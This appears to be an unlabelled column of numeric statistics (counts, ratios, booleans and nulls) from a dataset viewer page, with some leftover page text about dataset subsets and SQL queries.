| 14
| 104
| 5.571429
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023256
| 0.173077
| 104
| 5
| 50
| 20.8
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0.240385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.